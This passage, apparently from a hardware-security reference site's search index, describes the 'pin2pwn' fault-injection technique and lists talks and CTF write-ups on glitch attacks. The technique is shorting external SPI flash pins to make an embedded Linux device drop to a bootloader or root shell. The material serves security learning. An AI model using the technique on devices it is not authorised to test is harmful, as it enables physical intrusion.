</ul>"},{"location":"side-channel/fault-injection/#pin2pwn","title":"Pin2pwn","text":"<p>pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24</p> <p>In the case of an external SPI flash, it is possible for an attacker to short these pins:</p> <p>The MCU will not be able to read data from the external flash and will then show a stack trace, drop to a shell in the bootloader or, worse, a root shell on the embedded Linux system.</p> <p>Here is a practical example, putting a cable between MOSI and Chip Select:</p>"},{"location":"side-channel/fault-injection/#references","title":"References","text":"<ul> <li>rhme-2016 write-up Fault Injection - hydrabus</li> <li>Solving rhme fiesta from Riscure Hardware CTF 2016 with EM Fault Injection - Dangling Pointr - 2020, Oct 11</li> <li>Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - LiveOverflow - 16 june 2017</li> <li>pin2pwn: How to Root an 
Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24</li> <li>Replicant: Reproducing a Fault Injection Attack on the Trezor One - Voidstar - AUGUST 2022</li> <li>Your first Glitch/Voltage Fault Injection - hextree.io</li> <li>PicoGlitcher PCB - A dirt cheap fault-injection device</li> <li>Fault Injection using Crowbars on Embedded Systems - Colin O'Flynn</li> </ul>"}]}